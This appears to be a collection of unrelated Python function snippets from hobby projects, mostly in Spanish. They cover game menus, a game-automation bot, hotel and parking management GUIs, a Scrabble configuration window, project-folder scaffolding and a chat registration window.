self.btnSanitario.place(x=140, y=340)\n self.btnLavamanos.place(x=20, y=390)\n self.btnDucha.place(x=80, y=390)\n\n # Se pintan las lineas\n self.PINTARLEYENDAPLANOXY()\n # Se lanza el evento que actualiza la pantalla\n self.pantalla.after(0, self.update_graphic)\n self.pantalla.mainloop()", "def giaotranh():\n # printdb('def giaotranh')\n time.sleep(8)\n logging.info('def giao tranh')\n for x in range(6):\n screencap()\n # thấy next thì chuyển\n imgnext = imagesearch(path_Scr + '\\\\screencap.png',\n path_Scr + '\\\\next.png', 0.8)\n if imgnext.find() >= 1:\n # printdb('mạnh')\n danh()\n break\n else:\n if x == 5:\n check_loi_vethanh()\n else:\n time.sleep(2)", "def iniciarjuego():\r\n for i in range(4):\r\n if i == 1 or i == 0:\r\n color = (250,208,120,98)\r\n else:\r\n color = (159, 250, 120,98)\r\n x = random.choice(cuadrados)\r\n listafiguras.append(x)\r\n dibujarcuadrados(x, color)\r\n cuadrados.remove(x)\r\n\r\n for i in range(4):\r\n if i == 0 or i == 1:\r\n color = (195, 139, 255,100)\r\n else:\r\n color = (250, 242, 120,98)\r\n x = random.choice(cuadrados)\r\n listafiguras.append(x)\r\n dibujarcirculos(x, color)\r\n cuadrados.remove(x)\r\n\r\n for i in range(4):\r\n if i == 0 or i == 1:\r\n color = (250, 145, 137,98)\r\n else:\r\n color = (126, 139, 250,98)\r\n x = random.choice(cuadrados)\r\n listafiguras.append(x)\r\n dibujartriangulos(x, color)\r\n cuadrados.remove(x)\r\n\r\n for i in range(4):\r\n if i == 0 or i == 1:\r\n color = (176, 255, 237,100)\r\n else:\r\n color = (255, 176, 228,100)\r\n x = random.choice(cuadrados)\r\n listafiguras.append(x)\r\n dibujardiamantes(x, color)\r\n cuadrados.remove(x)", "def danh():\n # printdb('def danh')\n imgmanh = imagesearch(path_Scr + '\\\\screencap.png',\n path_Scr + '\\\\longden.png', 0.77)\n time.sleep(1)\n # mạnh bỏ qua\n if imgmanh.find() >= 1:\n click_next()\n logging.info('Next')\n giaotranh()\n else:\n click_danh()\n #######################lỗi mạng######################\n time.sleep(30)\n screencap()\n error = imagesearch(path_Scr + '\\\\screencap.png',\n path_Scr + '\\\\error.png', 0.88)\n # printdb('check lỗi ')\n if error.find() >= 1: # check lỗi mạng\n check_loi_vethanh()\n else:\n time.sleep(cTimeWar) # 40s\n # Rutlui() #opt1 check khiên --end (rỉa 1 khiên)\n DanhTiep() # opt2 check nút hồi thành --end\n # click_rutlui() #opt3 chờ cTimeWar --End (đánh theo time chỉ định)\n #####################################################", "def Ingresar(frm):\r\n #se asigna el valor de la variable seguir\r\n \r\n #se le pide al usuario que ingresa la altura\r\n posinicial=float(frm.txtposinicial.GetValue())\r\n #posinicial=raw_input(\"Ingrese la altura desde donde se va dejar caer (en metros): \")\r\n #se condiona para que solo permite ingresar numero positivos \r\n \r\n posinicial=float(posinicial)\r\n if posinicial>0:\r\n posinicial=posinicial+2\r\n return posinicial", "def newprojCode_withNamed():\n\tprint \"\\n======Creando Nuevo Proyecto======\\n\"\n\n\tproject_name = raw_input(\"*Nombre del Proyecto: \").lower()\n\n\tif project_name == \"\":\n\t\tcancel()\t\t#Si project_name esta vacio, se cierra directamente la aplicacion\n\n\tproject_languges = raw_input(\"*Lenguaje: \").upper()\n\tpname = project_name\n\n\tprint \"\\n==================================\\n\"\n\n\tdirectory = str(\"Project_\" + pname + \"/\")\n\n\tif os.path.exists(\"Project\"):\n\t\t#Nos ubicamos en el directorio raiz del Proyecto\n\t\tsubprocess.call([\"mkdir\", directory], shell=True)\n\t\tprint \"Creando el Directorio 
Raiz...\"\n\telse:\n\t\tos.mkdir(\"Project\")\n\t\tos.chdir(\"Project/\")\n\t\tsubprocess.call([\"mkdir\", directory])\n\t\tif not os.path.exists(directory):\n\t\t\tprint \"LA CARPETA {} NO EXISTE!\".format(directory)\n\t\t\tcancel()\n\t\telse:\n\t\t\tos.chdir(directory)\n\n\tprint \"Accediendo al Directorio\", dirs + \"...\"\n\tprint \"Creando el Directorio de Iconos...\"\n\tsubprocess.call(\"mkdir Iconos\", shell=True)\t\t#directorio iconos *\n\tprint \"Creando el Directorio de Debug...\"\n\tsubprocess.call(\"mkdir Debug\", shell=True)\t\t#directorio debug *\n\tprint \"Crenado el Directoiro de Scripts...\"\n\tsubprocess.call(\"mkdir Scripts\", shell=True)\t#directorio scripts *\n\tprint \"Se ha Creado el Proyecto\", pname, \"con Exito!!\"\n \n\t#Se crea el codigo de verificacion del proyecto\n\tfor i in range(0, 15):\n\t\tx = random.randint(1, 10000000)\t#Calcula numeros aleatorios de 1 a 10,000,000(10 millones)\n\t\tVerifiCode = x\t\t\t\t\t#VerifiCode deja el valor de 0 y toma el valor de x\n\t\tCodeValue = bin(VerifiCode)\t\t#Encripta el codigo a binario\n\n\n\tprint \"Su codigo de proyecto es:\", CodeValue + \"\\n\"\n\tprint \"Realizando copias de archivos prioritarios a los servidores...\"\n\tpcommands.ServerCopy()\n\tprint \"Copias realizadas con exito!!\"", "def otra_partida():\r\n\r\n for jugador_1 in juego.get_jugadores():\r\n\r\n \"\"\"Va Iterando sobre todos los jugadores disponibles de uno en uno\"\"\"\r\n color.utilizarVerde()\r\n print(\"\\nEmpieza: {}\".format(jugador_1.get_jugado_nombre()))\r\n num1, num2 = juego.get_rangos()\r\n print(\"Rango de {} al {}\".format(num1, num2))\r\n jugador_1.set_jugador_intentos(4)\r\n intentos = jugador_1.get_jugador_intentos()\r\n numero_oculto = randint(num1, num2)\r\n puntos = jugador_1.get_jugador_puntuacion_total()\r\n\r\n while intentos >= 0:\r\n\r\n \"\"\"Empieza la partida con 4 Intentos hasta que se quede en 0\"\"\"\r\n\r\n try:\r\n color.utilizarVerde()\r\n numero = int(input(\"\\nIntroduce un Número: \"))\r\n color.utilizarAmarillo()\r\n print(\"Intetos Restantes: {}\".format(intentos - 1))\r\n if numero_oculto < numero and intentos != 1:\r\n color.utilizarRojoClarito()\r\n print(\"\\nEs Demasiado Grande\\n\")\r\n intentos -= 1\r\n jugador_1.set_jugador_intentos(intentos)\r\n\r\n elif numero_oculto > numero and intentos != 1:\r\n color.utilizarRojoClarito()\r\n print(\"\\nEs Demasiado Pequeño\\n\")\r\n intentos -= 1\r\n jugador_1.set_jugador_intentos(intentos)\r\n\r\n elif numero == numero_oculto:\r\n color.utilizarAzul()\r\n print(\"\\nHas Ganado en el {0} intento\".format(intentos))\r\n puntos += 1\r\n jugador_1.set_jugador_puntuacion_total(puntos)\r\n input(\"Pulse enter para continuar...\")\r\n break\r\n\r\n elif numero != numero_oculto and intentos == 1:\r\n color.utilizarVerdeClarito()\r\n print(\"\\nEl número era {} :(\\n\".format(numero_oculto))\r\n color.utilizarRojo()\r\n print(format(\"GAME OVER\", \"-^75\"))\r\n input(\"Pulse enter para continuar...\")\r\n break\r\n\r\n except (ValueError, NameError):\r\n print(\"\\nError: Tiene que ser un número ...\")", "def empezando_la_partida():\n #estas 2 funciones las importo al menu y al juego\n texto = ' Una vez empezada la partida se encuentran a disposición del jugador el tablero \\n'+\\\n 'y el atril con las fichas para poder jugar, simplemente dando click en la ficha\\n'+\\\n 'deseada y el casillero del tablero deseado podemos ir armando letra a letra la \\n'+\\\n 'palabra de nuestro turno, de esta forma, formando palabras válidas, aprovechando\\n'+\\\n 'los casilleros 
de bonus y evitando los casilleros de penalización, el jugador va\\n'+\\\n 'sumando puntos.\\n'+\\\n ' El objetivo del juego es obtener más puntos que la maquina antes de que se acabe\\n'+\\\n 'el tiempo, se acaben las fichas del juego o que ya no se puedan formar palabras.'\n return texto", "def representarArbolAutomatico(self):\n if not self.stepByStep:\n print(\"Pintar paredes en auto\")\n # Reinicio la matrix\n self.reiniciarMatrix()\n if self.arbol.raiz != None:\n # Capturo todos los valores\n for i in self.arbol.returnArbolComoVector():\n \n # Esta variable captura si se debe de pintar en x o y\n xy = int(i[1])\n cordenadas = i[0]\n print(\"===========NODOS DEL ARBOL=============\")\n print(i)\n print(\"===========NODOS DEL ARBOL=============\")\n # Se pinta en x o y?\n if xy == 0:\n self.crearParedX(int(cordenadas[0]), int(cordenadas[1]))\n else:\n self.crearParedY(int(cordenadas[0]), int(cordenadas[1]))\n\n self.esperarUnRato()\n\n print(\"========LISTO PARA PINTAR EL SIGUIENTE================\")\n \n else:\n print(\"Arbol vacio\")", "def cargar_otras(self):\n\n stream_cargar = open ('yo_otros.txt', 'rt',encoding=\"utf-8\")\n datos=stream_cargar.readlines()\n \n # print(datos)\n # print (len(kasino.maquinas))\n\n lista_maquinas=[]\n lista_deco =[]\n day=\"\"\n money=\"\"\n\n contador=0\n dia_o_dinero=\"dia\"\n\n for i in datos[0]:\n # print(contador,i)\n if contador <8:\n lista_maquinas.append(i)\n contador+=1\n\n elif contador <17:\n lista_deco.append(i)\n contador+=1\n\n\n elif contador >= 17 and dia_o_dinero ==\"dia\":\n if i ==\"D\":\n pass\n elif i ==\"M\":\n dia_o_dinero=\"dinero\"\n else:\n day+=i\n elif contador >= 17 and dia_o_dinero == \"dinero\":\n money+=i\n \n \n\n # print(\"lm\",lista_maquinas)\n # print (\"ld\",lista_deco)\n # print(day,money)\n\n contador=0\n for i in kasino.maquinas:\n kasino.maquinas[i]=int(lista_maquinas[contador])\n contador+=1\n\n contador=0\n for i in kasino.decoracion:\n kasino.decoracion[i]=int(lista_deco[contador])\n contador+=1\n\n kasino.dia=int( day)\n kasino.dinero=int(money)", "def main():\r\n\r\n print(\"Berikut adalah daftar naga yang tersedia.\")\r\n for naga in daftar_naga:\r\n naga.hp_sementara = naga.hp_maks\r\n print(naga)\r\n\r\n indeks_naga: int = int(input(\"Tolong masukkan indeks dari naga pilihan Anda: \"))\r\n while indeks_naga < 0 or indeks_naga >= len(daftar_naga):\r\n indeks_naga = int(input(\"Maaf, input Anda tidak sah! Tolong masukkan indeks dari naga pilihan Anda: \"))\r\n\r\n naga_pilihan: Naga = daftar_naga[indeks_naga]\r\n naga_musuh: Naga = daftar_naga[random.randint(0, len(daftar_naga) - 1)]\r\n print(naga_pilihan)\r\n print(naga_musuh)\r\n giliran: int = 0 # nilai semula\r\n while naga_pilihan.hp_sementara >= 0 and naga_musuh.hp_sementara >= 0:\r\n giliran += 1\r\n # Giliran Anda adalah ketika nilai 'giliran' itu ganjil dan giliran musuh adalah ketika nilai 'giliran'\r\n # itu genap\r\n if giliran % 2 == 1:\r\n print(naga_pilihan.serang(naga_musuh))\r\n else:\r\n print(naga_musuh.serang(naga_pilihan))\r\n\r\n if naga_musuh.hp_sementara < 0:\r\n print(\"Anda menang!!!\")\r\n break\r\n if naga_pilihan.hp_sementara < 0:\r\n print(\"Anda kalah!!!\")\r\n break\r\n\r\n print(\"Tekan Y untuk ya.\")\r\n print(\"Tekan tombol apapun yang lainnya untuk tidak.\")\r\n tanya: str = input(\"Apakah Anda mau bertarung lagi? 
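cargar_otras above reconstructs the casino state by scanning a hand-rolled text format one character at a time. A JSON round-trip is a far less fragile way to persist the same fields; this sketch assumes the kasino object from the original:

import json

def guardar_otras(ruta="yo_otros.json"):
    estado = {"maquinas": kasino.maquinas, "decoracion": kasino.decoracion,
              "dia": kasino.dia, "dinero": kasino.dinero}
    with open(ruta, "w", encoding="utf-8") as f:
        json.dump(estado, f)

def cargar_otras(ruta="yo_otros.json"):
    with open(ruta, encoding="utf-8") as f:
        estado = json.load(f)
    kasino.maquinas.update(estado["maquinas"])
    kasino.decoracion.update(estado["decoracion"])
    kasino.dia = estado["dia"]
    kasino.dinero = estado["dinero"]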
\")\r\n if tanya == \"Y\":\r\n main()\r\n else:\r\n sys.exit()", "def bajar_pluma(self):\n self.pluma = self.pluma.cambiar_estado(True)", "def on_btnAltaServicioBasico_clicked(self,widget):\n try:\n conexion.cur.execute('select * from precios')\n precios = conexion.cur.fetchall()\n if(variables.lblCodigoReservaServicio.get_text()!=\"\"):\n codigoReservaServicio = variables.lblCodigoReservaServicio.get_text()\n if(variables.rbDesayuno.get_active()):\n existeDesayuno=False\n for registro in variables.listFactura:\n print(registro[0])\n if registro[0] == \"Desayuno\":\n existeDesayuno=True\n if existeDesayuno==False:\n precio=precios[0][0]\n concepto=\"Desayuno\"\n datos=(codigoReservaServicio,concepto,precio)\n funciones_servicios.insertarServicio(datos)\n else:\n variables.mensajeError = \"No puedes insertar otro desayuno\"\n variables.vError.show()\n\n elif(variables.rbComida.get_active()):\n existeComida = False\n for registro in variables.listFactura:\n if registro[0] == \"Comida\":\n existeComida = True\n if existeComida == False:\n precio = precios[0][1]\n concepto = \"Comida\"\n datos = (codigoReservaServicio, concepto, precio)\n funciones_servicios.insertarServicio(datos)\n else:\n variables.mensajeError = \"No puedes insertar otra comida\"\n variables.vError.show()\n\n\n if(variables.chkParking.get_active()):\n existeParking = False\n for registro in variables.listFactura:\n if registro[0] == \"Parking\":\n existeParking = True\n if existeParking == False:\n precio = precios[0][2]\n concepto = \"Parking\"\n datos = (codigoReservaServicio, concepto, precio)\n funciones_servicios.insertarServicio(datos)\n else:\n variables.mensajeError = \"No puedes insertar otro servicio de parking\"\n variables.vError.show()\n\n\n variables.rbNinguno.set_active(True)\n variables.chkParking.set_active(False)\n funciones_servicios.listadoServicio(variables.listServicios,codigoReservaServicio)\n funciones_factura.listadoServicios(variables.listFactura,variables.codr,variables.lblHabitacionServicio.get_text())\n funciones_factura.calcularPreciosServicios()\n\n else:\n variables.mensajeError=\"Debes seleccionar un codigo de reserva\"\n variables.vError.show()\n\n\n except Exception as e:\n print(\"Error alta servicio\")\n print(e)", "def posicioAlParking(matricula):\n if(_formatMatriculaValid(matricula)):\n con = lite.connect('parking.db')\n cur = con.cursor()\n try:\n cur.execute(\"SELECT placa FROM parking WHERE id_cotxe=?;\",(matricula,))\n row = cur.fetchone()\n if row:\n print \"El cotxe amb matricula\",matricula,\" es troba a la plaça\", row[0]\n else:\n print \"El coche amb matricula\",matricula,\"no es troba al parking\"\n\n except:\n pass\n con.close()\n else:\n print(\"Format matricula invalid per buscar la seva posicio.\")", "def main():\n titulo()\n top_10() #muestra el top10 cada vez que se inicie el juego\n print(\"{}Bienvenido ¿crees tener lo necesario para hundir mi flota?{}\".format(Fore.BLUE, Fore.RESET))\n sleep(2)\n print(\"{}No lo creo JAJAJA{}\".format(Fore.RED, Fore.RESET))\n continuar_jugando = True\n while continuar_jugando:\n print(\"\"\"\n Menu \n1) Jugar una partida\n2) Ver todos los usuarios\n3) Editar un usuario\n4) Ver el leaderboard\n5) Ver estadisticas\n6) Salir del Juego\n\"\"\")\n while True: #validacion para la opcion de menu elegida por el usuario\n try:\n elegir = int(input(\"{}Ingrese su opcion:{} \".format(Fore.LIGHTYELLOW_EX, Fore.RESET)))\n if elegir < 1 or elegir > 6:\n raise ValueError\n break\n except ValueError:\n print(\"{}La opcion ingresada no es 
valida{}\".format(Fore.LIGHTRED_EX, Fore.RESET))\n if elegir == 1:\n print(\"\\n\")\n lista_usuarios.append(datos_usuario())\n juego()\n print(\"\\n{}1) Volver al menu \\n{}2) Salir {}\".format(Fore.LIGHTBLUE_EX, Fore.LIGHTRED_EX, Fore.RESET))\n while True: \n try:\n seguir = int(input(\"{}Ingrese su opcion:{} \".format(Fore.LIGHTYELLOW_EX, Fore.RESET)))\n if seguir < 1 or seguir > 2:\n raise ValueError\n break\n except ValueError:\n print(\"{}La opcion ingresada no es valida{}\".format(Fore.LIGHTRED_EX, Fore.RESET))\n if seguir == 1:\n continuar_jugando = True\n else: continuar_jugando = False\n elif elegir == 2:\n ver(edit=False)\n sleep(1.5)\n print(\"\\n{}1) Volver al menu \\n{}2) Salir {}\".format(Fore.LIGHTBLUE_EX, Fore.LIGHTRED_EX, Fore.RESET))\n while True: \n try:\n seguir = int(input(\"{}Ingrese su opcion:{} \".format(Fore.LIGHTYELLOW_EX, Fore.RESET)))\n if seguir < 1 or seguir > 2:\n raise ValueError\n break\n except ValueError:\n print(\"{}La opcion ingresada no es valida{}\".format(Fore.LIGHTRED_EX, Fore.RESET))\n if seguir == 1:\n continuar_jugando = True\n else: continuar_jugando = False\n elif elegir == 3:\n print(\"\\n\")\n ver(edit = True)\n with open(\"Basedatos.txt\", \"r\") as bd:\n total = bd.readlines()\n largo = len(total)\n while True:\n try:\n seleccion = int(input(\"Seleccione el usuario que desee actualizar: \"))\n if seleccion > int(largo) or seleccion < 1:\n raise ValueError\n break\n except ValueError:\n print(\"{}La opcion ingresada no es valida{}\".format(Fore.LIGHTRED_EX, Fore.RESET))\n actualizar_datos(seleccion)\n sleep(1)\n print(\"Su usuario ha sido actualizado correctamente\")\n print(\"\\n{}1) Volver al menu \\n{}2) Salir {}\".format(Fore.LIGHTBLUE_EX, Fore.LIGHTRED_EX, Fore.RESET))\n while True: \n try:\n seguir = int(input(\"{}Ingrese su opcion:{} \".format(Fore.LIGHTYELLOW_EX, Fore.RESET)))\n if seguir < 1 or seguir > 2:\n raise ValueError\n break\n except ValueError:\n print(\"{}La opcion ingresada no es valida{}\".format(Fore.LIGHTRED_EX, Fore.RESET))\n if seguir == 1:\n continuar_jugando = True\n else: continuar_jugando = False\n elif elegir == 4:\n top_10()\n sleep(1.5)\n print(\"\\n{}1) Volver al menu \\n{}2) Salir {}\".format(Fore.LIGHTBLUE_EX, Fore.LIGHTRED_EX, Fore.RESET))\n while True: \n try:\n seguir = int(input(\"{}Ingrese su opcion:{} \".format(Fore.LIGHTYELLOW_EX, Fore.RESET)))\n if seguir < 1 or seguir > 2:\n raise ValueError\n break\n except ValueError:\n print(\"{}La opcion ingresada no es valida{}\".format(Fore.LIGHTRED_EX, Fore.RESET))\n if seguir == 1:\n continuar_jugando = True\n else: continuar_jugando = False\n elif elegir == 5:\n print(\"\\n\")\n promedio_disparos()\n puntos_genero()\n usuarios_edades()\n sleep(1.5)\n print(\"\\n{}1) Volver al menu \\n{}2) Salir {}\".format(Fore.LIGHTBLUE_EX, Fore.LIGHTRED_EX, Fore.RESET))\n while True: \n try:\n seguir = int(input(\"{}Ingrese su opcion:{} \".format(Fore.LIGHTYELLOW_EX, Fore.RESET)))\n if seguir < 1 or seguir > 2:\n raise ValueError\n break\n except ValueError:\n print(\"{}La opcion ingresada no es valida{}\".format(Fore.LIGHTRED_EX, Fore.RESET))\n if seguir == 1:\n continuar_jugando = True\n else: continuar_jugando = False\n elif elegir == 6:\n continuar_jugando = False\n print(\"Te deseamos un feliz dia, gracias por jugar \" + Fore.LIGHTBLUE_EX + \"███ \" + \"BATTLESHIP\" + \" ███\" + Fore.RESET)\n sleep(1.25)\n top_10()", "def main():\n show_title(\"BENVENID@\")\n # Splash 10x10 matriz BOOTLOOP\n splash =[\n [ \"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\" ],\n [ 
\"\",\"\",\"\",\"U\",\"N\",\"A\",\"L\",\"\",\"\",\"\" ],\n [ \"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\" ],\n [ \"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\" ],\n [ \"\",\"\",\"\",\"S\",\"O\",\"P\",\"A\",\"\",\"\",\"\" ],\n [ \"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\" ],\n [ \"\",\"\",\"\",\"\",\"D\",\"E\",\"\",\"\",\"\",\"\" ],\n [ \"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\" ],\n [ \"\",\"\",\"L\",\"E\",\"T\",\"R\",\"A\",\"S\",\"\",\"\" ],\n [ \"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\" ]\n ]\n completar_matrix(splash, 10, False) \n mostrar_tablero(splash, 10) \n time.sleep(5) # Tiempo de espera 5 segundos\n clear_window()\n menu_inicial()", "def printMenu():\n print(\"\\nBienvenido\")\n print(\"1- Cargar Datos\")\n print(\"2- Contar los elementos de la Lista\")\n print(\"3- Contar elementos filtrados por palabra clave\")\n print(\"4- Consultar elementos a partir de dos listas\")\n print(\"5- Consultar buenas peliculas\")\n print(\"0- Salir\")", "def commands_sites(update: Update, context: CallbackContext) -> None:\n keyboard = [\n [\n InlineKeyboardButton(\"Diretta\", callback_data='/diretta'),\n InlineKeyboardButton(\"Probabili Formazioni\", callback_data='/fanta_probabili_formazioni'),\n ],\n [\n InlineKeyboardButton(\"Regolamento Leghe Private\", callback_data='/fanta_regolamento_leghe_private')\n ],\n ]\n reply_markup = InlineKeyboardMarkup(keyboard)\n update.message.reply_text('Comandi disponibili', reply_markup=reply_markup)", "def main():\n\t\n\tif config.FORCE_CONSOLE:\n\t\tdeboggue(\"Le jeu est en mode console\")\n\t\tchoisir_programme()\n\telse:\n\t\tdeboggue(\"Le jeu est en mode graphique\")\n\t\tfenetre = creer_fenetre()\n\t\timages = charge_images()\n\t\tchoisir_programme_gui(fenetre, images)\n\n\tdeboggue(\"Arrêt normal\")", "def pruebas(self):\n self.gestor_pca.pruebas()\n return None", "def accueil():\r\n global etat\r\n background(0,128,128)\r\n image(tireur,0,0) \r\n rectMode(CORNERS)\r\n fill(100)\r\n rect(0,60,250,120)\r\n rect(500,60,750,120)\r\n fill(0)\r\n textSize(30)\r\n text(\"PVP\",95,100) \r\n text(\"ORDINATEUR\",520,100) \r\n if (mousePressed) and mouseX<250 and mouseX>0 and mouseY<120 and mouseY>60: #si on clique sur le rectangle jouer\r\n etat=1 #on passe en mode jeu\r\n if (mousePressed) and mouseX<750 and mouseX>500 and mouseY<120 and mouseY>60: \r\n etat=2", "def on_btnBajacli_clicked(self, widget):\n\n try:\n dni = variables.filacli[0].get_text()\n if dni != '' :\n funcionescli.bajacli(dni)\n funcionescli.listadocli(variables.listclientes)\n funcionescli.limpiarentry(variables.filacli)\n else:\n print('falta dni u otro error')\n except:\n print(\"error en botón baja cliente\")", "def newprojcode(name):\n\tprint \"\\n======Creando Nuevo Proyecto======\\n\"\n\tproject_name = name\n\n\tif project_name == \"\" or project_name == None:\n\t\tcancel()\n\n\tprint \"*Nombre del Proyecto: \", project_name\n\n\tproject_languges = raw_input(\"*Lenguaje: \")\n\tpname = project_name\n\n\tprint \"\\n==================================\\n\"\n\n\tdirectory = str(\"Project_\" + pname + \"/\")\n\n\tif os.path.exists(\"Project\"):\n\t\t#Nos ubicamos en el directorio raiz del Proyecto\n\t\tsubprocess.call([\"mkdir\", directory], shell=True)\n\t\tprint \"Creando el Directorio Raiz...\"\n\telse:\n\t\tos.mkdir(\"Project\")\n\t\tos.chdir(\"Project/\")\n\t\tsubprocess.call([\"mkdir\", directory])\n\t\tif not os.path.exists(directory):\n\t\t\tprint \"LA CARPETA {} NO 
EXISTE!\".format(directory)\n\t\t\tcancel()\n\t\telse:\n\t\t\tos.chdir(directory)\n\n\tdirs = \"Project\" + pname + \"/\"\n\t#Nos ubicamos en el directorio raiz del Proyecto\n\tos.chdir(dirs)\n\tprint \"Accediendo al Directorio\", dirs + \"...\"\n\tprint \"Creando el Directorio de Iconos...\"\n\tsubprocess.call(\"mkdir Iconos\", shell=True)\t\t#directorio iconos *\n\tprint \"Creando el Directorio de Debug...\"\n\tsubprocess.call(\"mkdir Debug\", shell=True)\t\t#directorio debug *\n\tprint \"Crenado el Directoiro de Scripts...\"\n\tsubprocess.call(\"mkdir Scripts\", shell=True)\t#directorio scripts *\n\tprint \"Creando los Archivos XML del Proyecto...\\n\"\n\tsubprocess.call(\"source XMLProjectFiles.sh\", shell=True)\n\tprint \"Se ha Creado el Proyecto\", pname, \" con Exito!!\"\n\n\t#Se crea el codigo de verificacion del proyecto\n\tfor i in range(0, 15):\n\t\tx = random.randint(1, 1000000)\t#Calcula numeros aleatorios de 1 a 1,000,000(1 millon)\n\t\tVerifiCode = x\t\t\t\t\t#VerifiCode deja el valor de 0 y toma el valor de x\n\t\tCodeValue = bin(VerifiCode)\t\t#Encripta el codigo a binario\n\n\tprint \"Su codigo de proyecto es:\", CodeValue + \"\\n\"\n\tSaveKey(CodeValue)\n\tprint \"Realizando copias de archivos prioritarios a los servidores...\"\n\tpcommands.ServerCopy()\n\tprint \"Copias realizadas con exito!!\"", "def configurar():\n try:\n with open(f'archivos{ruta()}valores_puntajes.json',\n encoding='UTF-8') as f:\n dic = json.load(f)\n except FileNotFoundError:\n dic = crear_valores_puntajes()\n with open(f'archivos{ruta()}valores_puntajes.json', 'w',\n encoding='UTF-8') as f:\n json.dump(dic, f, indent=4)\n\n letras = dic['Personalizada']['bolsa']\n lista_letras= []\n for elemento in letras:\n lista_letras.append(elemento[0])\n valor_letra = letras[0][1] \n valor_punto = dic['Personalizada']['puntos_letra']['a']\n layout=[\n [sg.T(\"Perfil personalizado\", size=(17,1), justification = \"center\",\n font=(\"Georgia\", 17))],\n [sg.T(\"Letra\",font=(\"Georgia\", 12)),\n sg.Combo(lista_letras, size=(8,1), default_value= 'a', enable_events=True),\n sg.T(\"Cantidad:\", font=(\"Georgia\", 12),),\n sg.Slider(range=(1, 12), orientation='h', size=(13, 20), default_value=valor_letra),\n sg.T(\"Valor:\", font=(\"Georgia\", 12),),\n sg.Slider(range=(1, 20), orientation='h', size=(20, 20), default_value=valor_punto)],\n [sg.T(\"Dificultad de la IA: \"),\n sg.DropDown(('Facil','Medio','Dificil'),\n default_value=(dic['Personalizada']['dificultad_IA']),size=(10,1)),\n sg.T(\"Dificultad del tablero: \"),\n sg.DropDown(('Facil','Medio','Dificil'),\n default_value=(dic['Personalizada']['dificultad_Tablero']),size=(10,1))],\n [sg.Button(\"Guardar\", size=(12, 1), key=\"-guardar-\")]\n ]\n\n window_configurar = sg.Window(\"ScrabbleAR - Configurar\").Layout(layout)\n\n while True:\n event, values = window_configurar.Read()\n \"\"\"\n values[0] = retorna la letra elegida\n values[1] = retorna la cantidad de letras\n values[2] = retorna el puntaje seleccionado\n values[3] = retorna la dificultad de la IA\n values[4] = retorna la dificultad del tablero\n \"\"\"\n try:\n for item in letras:\n if item[0] == values[0]:\n valor_letra = int(item[1])\n window_configurar.find_element(1).Update(valor_letra)\n valor_punto = dic['Personalizada']['puntos_letra'][values[0]]\n window_configurar.find_element(2).Update(valor_punto)\n except:\n break\n if event == None:\n break\n elif event == '-guardar-':\n for item in letras:\n if item[0] == values[0]:\n item[1] = int(values[1])\n break\n dic['Personalizada']['bolsa'] 
= letras\n dic['Personalizada']['puntos_letra'][values[0]] = int(values[2])\n dic['Personalizada']['dificultad_IA'] = values[3]\n dic['Personalizada']['dificultad_Tablero'] = values[4]\n try:\n with open(f'archivos{ruta()}valores_puntajes.json', 'w', encoding='UTF-8') as f:\n json.dump(dic, f, indent=4)\n sg.popup('Se guardaron los cambios', auto_close= True, auto_close_duration= 1)\n except FileNotFoundError:\n sg.popup('No se encuentra el archivo \"valores_puntajes.json\"')\n window_configurar.Close()", "def on_menuBarPreciosServicios_activate(self,widget):\n\n try:\n variables.venPrecios.show()\n conexion.cur.execute('select * from precios')\n precios = conexion.cur.fetchall()\n variables.entPrecioDesayuno.set_text(str(precios[0][0]))\n variables.entPrecioComida.set_text(str(precios[0][1]))\n variables.entPrecioParking.set_text(str(precios[0][2]))\n except:\n print('error abrir ventana precios')", "def run():\n menu_activo = False\n opciones = [#Opciones del juego, un arreglo que contiene tuplas (\"Nombre_opcion\", funcion_asociada)\n (\"Jugar\", comenzar_nuevo_juego),#Escena uno, donde Link se enfrenta con los minijefes\n (u\"¿Como Jugar?\", como_jugar),#La u al principio es para indicar a pygame el caracter unicode de las tildes y signo de pregunta. Se muestra una escena donde se dira al usuario, como jugar\n (\"Creditos\", creditos),\n (\"Salir\", salir_del_programa)#Opcion para salir del programa\n ]\n fondo = pygame.image.load(\"imagenes/imgInicio.png\").convert()\n miMenu = menu.Menu(opciones)\n while not menu_activo:\n for e in pygame.event.get():\n if e.type == QUIT:\n # pygame.quit()\n # quit()\n import sys\n sys.exit(0)\n screen.blit(fondo, (0, 0))#Establecemos el fondo\n miMenu.actualizar()#eventos para el menu\n miMenu.imprimir(screen)#mostramos las opciones del menú\n pygame.display.update()#actualizamos !!!IMPORTANTE PARA QUE SE MUESTRE CORRECTAMENTE\n clock.tick(50)#Transicion de frames por segundo, da un efeco de transcion al menu\n #comenzar_nuevo_juego() #Funcion que comienza un nuevo juego ", "def aplicar_operacion_basicas(self,operacion,complejo1,complejo2):\n nuevo_complejo = self.controlador.ejecutar_operacion_basica(operacion,complejo1,complejo2)\n print('\\nResultado\\n')\n nuevo_complejo.formaBinomica()\n nuevo_complejo.formaPolar()\n print('\\n')", "def ventanaprincipal():\r\n titulo_principal=pygame.image.load(\"../recursor/Imagenes juegos/parejas_1.png\")\r\n ventana.blit(titulo_principal, (405,0))\r\n logo_plaython=pygame.image.load(\"../recursor/Imagenes juegos/plaython.png\")#Cargamos la imagen del logo\r\n imagen_decoracion=pygame.image.load(\"../recursor/Imagenes juegos/imagenpc.png\")\r\n imagen_decoracion = pygame.transform.scale(imagen_decoracion, (210, 210))\r\n ventana.blit(logo_plaython, (900, 180))\r\n ventana.blit(imagen_decoracion,(100,240))\r\n titulo_plaython = pygame.image.load(\"../recursor/Imagenes juegos/TITULOPLAYTHON.png\")\r\n titulo_plaython = pygame.transform.scale(titulo_plaython, (240, 150))\r\n ventana.blit(titulo_plaython, (505, 550))", "def preberi_pot(ukazi):", "def preberi_pot(ukazi):", "def preberi_pot(ukazi):", "def preberi_pot(ukazi):", "def preberi_pot(ukazi):", "def draw_register_block(host, port):\n root = tkinter.Tk()\n\n root.title('Регистрация в чате')\n\n lbl = tkinter.Label(text='Введите имя')\n ent = tkinter.Entry(width=40)\n but = tkinter.Button(text=\"Зарегистрироваться\")\n\n but.bind(\"<Return>\", lambda event: asyncio.run(\n register_user(host, port, ent))\n )\n\n lbl.pack()\n ent.pack()\n\n but[\"command\"] = 
